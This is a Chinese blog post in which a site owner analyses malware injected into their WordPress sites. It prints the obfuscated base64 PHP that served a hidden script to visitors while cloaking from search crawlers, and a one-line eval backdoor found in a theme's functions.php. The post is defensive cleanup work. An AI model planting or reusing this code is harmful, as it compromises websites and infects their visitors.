打开网页NOD32立马提示病毒,上网一看说WordPress存在着XSS漏洞,对WordPress不熟悉只好通过升级安装到最新版本搞定这个问题。
接着顺便访问下自己写的Blog,居然同样被挂马了,感到杯具之余正好分析下这马的调用方式。拖下所有文件,查找和首页挂马代码相似的代码:
1. 发现所有目录index.php最开始处都被挂了一段代码,基本能说明挂马操作是程序自动处理的。
2. 内容被PHP base64编码和JS fromCharCode混淆过。
3. 如果访问者是搜索引擎的爬虫,则不执行挂马操作,这样不会让搜索引擎将网站标识为恶意网站(这次知道被挂马,是一个不在这个列表里的搜索引擎提醒的)。
顺便附上相应代码,知己知彼,百战不殆。
<?php
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkoyUnZZeWNySjNWdFpTY3JKMjUwSjEwcFlXRTlMMXgzTHk1bGVHVmpLRzVsZHlCRVlYUmxLQ2twTG1sdVpHVjRLMXRkTzJGaFlUMG5NQ2M3ZEhKNWUyNWxkeUJzYjJOaGRHbHZiaWdwTzMxallYUmphQ2h4Y1hFcGUzTnpQVk4wY21sdVp6dDlhV1lvWVdFdWFXNWtaWGhQWmloaFlXRXBJVDA5TFRFcENtWTlKeTB6TUhZdE16QjJOaloyTmpOMkxUZDJNWFkyTVhZM01uWTJNSFkzT0hZM01IWTJNblkzTVhZM04zWTNkalkwZGpZeWRqYzNkak13ZGpZNWRqWXlkamN3ZGpZeWRqY3hkamMzZGpjMmRqSTNkamd5ZGpRMWRqVTRkalkwZGpNNWRqVTRkamN3ZGpZeWRqRjJNSFkxT1hZM01uWTJNWFk0TW5Zd2RqSjJOVEoyT1hZMU5IWXlkamcwZGkwek1IWXRNekIyTFRNd2RqWTJkall6ZGpjMWRqVTRkamN3ZGpZeWRqYzFkakYyTW5ZeU1IWXRNekIyTFRNd2RqZzJkaTAzZGpZeWRqWTVkamMyZGpZeWRpMDNkamcwZGkwek1IWXRNekIyTFRNd2RqWXhkamN5ZGpZd2RqYzRkamN3ZGpZeWRqY3hkamMzZGpkMk9EQjJOelYyTmpaMk56ZDJOakoyTVhZdE5YWXlNWFkyTm5ZMk0zWTNOWFkxT0hZM01IWTJNbll0TjNZM05uWTNOWFkyTUhZeU1uWXdkalkxZGpjM2RqYzNkamN6ZGpFNWRqaDJPSFkxT1hZMU9YWTNNSFkyTUhZMU9YWTJNM1kyTUhZM09IWTNkall6ZGpjMWRqWXlkall5ZGpjM2RqWXdkamN6ZGpkMk5qQjJOekoyTnpCMk9IWTJNWFk0ZGpFemRqbDJNVE4yTjNZM00zWTJOWFkzTTNZeU5IWTJOSFkzTW5ZeU1uWXhNSFl3ZGkwM2RqZ3dkalkyZGpZeGRqYzNkalkxZGpJeWRqQjJNVEIyT1hZd2RpMDNkalkxZGpZeWRqWTJkalkwZGpZMWRqYzNkakl5ZGpCMk1UQjJPWFl3ZGkwM2RqYzJkamMzZGpneWRqWTVkall5ZGpJeWRqQjJOemwyTmpaMk56WjJOaloyTlRsMk5qWjJOamwyTmpaMk56ZDJPREoyTVRsMk5qVjJOaloyTmpGMk5qRjJOakoyTnpGMk1qQjJOek4yTnpKMk56WjJOaloyTnpkMk5qWjJOekoyTnpGMk1UbDJOVGgyTlRsMk56WjJOekoyTmpsMk56aDJOemQyTmpKMk1qQjJOamwyTmpKMk5qTjJOemQyTVRsMk9YWXlNSFkzTjNZM01uWTNNM1l4T1hZNWRqSXdkakIyTWpOMk1qRjJPSFkyTm5ZMk0zWTNOWFkxT0hZM01IWTJNbll5TTNZdE5YWXlkakl3ZGkwek1IWXRNekIyT0RaMkxUTXdkaTB6TUhZMk0zWTNPSFkzTVhZMk1IWTNOM1kyTm5ZM01uWTNNWFl0TjNZMk5uWTJNM1kzTlhZMU9IWTNNSFkyTW5ZM05YWXhkakoyT0RSMkxUTXdkaTB6TUhZdE16QjJOemwyTlRoMk56VjJMVGQyTmpOMkxUZDJNakoyTFRkMk5qRjJOekoyTmpCMk56aDJOekIyTmpKMk56RjJOemQyTjNZMk1IWTNOWFkyTW5ZMU9IWTNOM1kyTW5Zek1IWTJPWFkyTW5ZM01IWTJNblkzTVhZM04zWXhkakIyTmpaMk5qTjJOelYyTlRoMk56QjJOakoyTUhZeWRqSXdkall6ZGpkMk56WjJOakoyTnpkMk1qWjJOemQyTnpkMk56VjJOaloyTlRsMk56aDJOemQyTmpKMk1YWXdkamMyZGpjMWRqWXdkakIyTlhZd2RqWTFkamMzZGpjM2RqY3pkakU1ZGpoMk9IWTFPWFkxT1hZM01IWTJNSFkxT1hZMk0zWTJNSFkzT0hZM2RqWXpkamMxZGpZeWRqWXlkamMzZGpZd2RqY3pkamQyTmpCMk56SjJOekIyT0hZMk1YWTRkakV6ZGpsMk1UTjJOM1kzTTNZMk5YWTNNM1l5TkhZMk5IWTNNbll5TW5ZeE1IWXdkakoyTWpCMk5qTjJOM1kzTm5ZM04zWTRNblkyT1hZMk1uWTNkamM1ZGpZMmRqYzJkalkyZGpVNWRqWTJkalk1ZGpZMmRqYzNkamd5ZGpJeWRqQjJOalYyTmpaMk5qRjJOakYyTmpKMk56RjJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOek4yTnpKMk56WjJOaloyTnpkMk5qWjJOekoyTnpGMk1qSjJNSFkxT0hZMU9YWTNOblkzTW5ZMk9YWTNPSFkzTjNZMk1uWXdkakl3ZGpZemRqZDJOeloyTnpkMk9ESjJOamwyTmpKMk4zWTJPWFkyTW5ZMk0zWTNOM1l5TW5Zd2RqbDJNSFl5TUhZMk0zWTNkamMyZGpjM2RqZ3lkalk1ZGpZeWRqZDJOemQyTnpKMk56TjJNakoyTUhZNWRqQjJNakIyTmpOMk4zWTNOblkyTW5ZM04zWXlOblkzTjNZM04zWTNOWFkyTm5ZMU9YWTNPSFkzTjNZMk1uWXhkakIyT0RCMk5qWjJOakYyTnpkMk5qVjJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJOak4yTjNZM05uWTJNblkzTjNZeU5uWTNOM1kzTjNZM05YWTJOblkxT1hZM09IWTNOM1kyTW5ZeGRqQjJOalYyTmpKMk5qWjJOalIyTmpWMk56ZDJNSFkxZGpCMk1UQjJPWFl3ZGpKMk1qQjJMVE13ZGkwek1IWXRNekIyTmpGMk56SjJOakIyTnpoMk56QjJOakoyTnpGMk56ZDJOM1kyTkhZMk1uWTNOM1l6TUhZMk9YWTJNblkzTUhZMk1uWTNNWFkzTjNZM05uWXlOM1k0TW5ZME5YWTFPSFkyTkhZek9YWTFPSFkzTUhZMk1uWXhkakIyTlRsMk56SjJOakYyT0RKMk1IWXlkalV5ZGpsMk5UUjJOM1kxT0hZM00zWTNNM1kyTW5ZM01YWTJNWFl5T0hZMk5YWTJOblkyT1hZMk1YWXhkall6ZGpKMk1qQjJMVE13ZGkwek1IWTROaWN1YzNCc2FYUW9KM1luS1R0dFpEMG5ZU2M3WlQxM2FXNWtiM2RiSjJVbkt5ZDJZV3duWFR0M1BXWTdjejBuSnp0bWNqMG5aaWNySjNKdkp5c25iU2NySjBOb1lYSW5PM0k5YzNOYlpuSXJKME52WkdVblhUdG1iM0lvYVQwd095MXBQaTEzTG14bGJtZDBhRHRwS3lzcGUybzlhVHR6UFhNcmNpZ3pPU3N4S25kYmFsMHBPMzBLYVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVVvY3lrN1BDOXpZM0pwY0hRKycpKTsNCn0='));
?>
@2012-03-21 前几天删除上述挂马代码后,隔几小时又被改了-_-,查看WEB日志文件发现有些IP时不时调用下主题目录下的functions.php,虽然不熟悉wordpress,但感觉普通用户是不可能直接访问这个文件的,查看下内容果然还有一段其它混淆过的代码:
if (isset($_REQUEST['asc'])) {
eval(stripslashes($_REQUEST['asc']));
exit;
}
去掉后观察了几天,貌似搞定了。
目前没有留言,等您坐沙发呢!